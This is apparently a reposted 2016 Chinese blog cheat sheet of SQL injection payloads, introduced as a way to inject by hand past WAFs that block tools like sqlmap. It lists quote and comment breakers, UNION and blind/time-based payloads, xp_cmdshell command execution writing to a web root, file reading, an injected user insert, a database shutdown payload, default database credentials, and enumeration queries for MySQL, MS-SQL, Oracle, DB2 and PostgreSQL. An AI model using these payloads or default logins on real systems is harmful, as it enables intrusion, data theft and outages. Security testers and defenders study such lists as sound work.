常见的SQL注入检测语句
2016-04-26 12:40
274 查看
0x00 前言
现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击0x01 发现SQL 注入
1 查询语法中断:单引号( ‘ ), 双引号( “ )
2 SQL注释注入:双连字符 (-- ), 散列 (# ), 注释( /* )
3 扩展/附加查询: 分号 ( ; )
4 注射/绕过过滤器:使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL 来转换上面的注入字符
0x02 常用的SQL注入命令
1 Union注入:Union all select NULL (Multiple columns)2 命令执行:1;exec master..xp_cmdshell ‘dir’>C:\inetpub\wwwroot\dir.txt’ OR master.dbo.xp_cmdshell
3 加载文件:LOAD_FILE(), User UTL_FILE and utfReadfileAsTable
4 添加用户:1’; insert into users values(‘nto’,’nto123’)
5 DOS攻击:1’;shutdown –
6 获取字段: select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co
0x02 常用的SQL盲注命令
1 快速检测:AND 1=1, AND 1=0
2 查询用户:1+AND+USER_NAME()=’dbo’
3 延时注入:1;waitfor+delay+’0:0:10’
4 检查SA用户:SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
5 跳转/休眠:BENCHMARK(TIMES, TASK), pg_sleep(10)
0x03 数据库的默认用户名
Oracle scott/tiger, dbsnmp/dbsnmpMySQL mysql/<BLANK>, root/<BLANK>
PostgreSQL postgres/<BLANK>
MS-SQL sa/<BLANK>
DB2 db2admin/db2admin
0x04 常见的后台数据库SQL注入命令
1 MySQLGrab @@version
Users * from mysql.user
Tables table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Database distinct(db) FROM mysql.db
Columns table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’
Running User user()
2 MS-SQL
Grab version @@version
Users name FROM master..syslogins
Tables name FROM master..sysobjects WHERE xtype = ‘U’
Database name FROM master..sysdatabases;
Columns name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
Running User DB_NAME()
3 Oracle
Grab version table v$version compare with ‘Oracle%’
Users * from dba_users
Tables table_name from all_tables
Database distinct owner from all_tables
Columns column_name from all_tab_columns where table_name=‘<TABLENAME>
Running User user from dual
4 IBM DB2
Grab version Versionnumber from sysibm.sysversions;
Users user from sysibm.sysdummy1
Tables name from sysibm.systables
Database schemaname from syscat.schemata
Columns name, tbname, coltype from sysibm.syscolumns
Running User user from sysibm.sysdummy1
5 PostgreSQL
Grab version version()
Users * from pg_user
Database datname FROM pg_database
Running User user;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Mysql-5.7.11-winx64安装步骤
- vsftpd的基于pam_mysql的虚拟用户机制
- Oracle 控制文件和日志文件
- 《oracle每天一练》触发器不能调用或间接调用COMMIT,ROLLBACK等DCL语句
- CentOS7使用Redis
- Windows下MySQL-zip方式安装
- 毕业设计之mysql的source命令
- mysql的auto_increment详解 默认从1开始递增
- mysql 替换某个字段中的某个字符
- oracle 分组编号 ROW_NUMBER() OVER(PARTITION BY COLUMN ORDER BY COLUMN ) 的用法
- MySQL异常恢复之无主键情况下innodb数据恢复的方法
- 禁用SQL Server Management Studio的IntelliSense
- Voltdb Supported SQL DDL Statements
- Redis实战(七)
- mysql笔记
- Redis实战(六)
- MySQL性能瓶颈排查定位实例详解
- POI导出数据库数据到excel
- mysql写不了中文数据
- mysql触发器笔记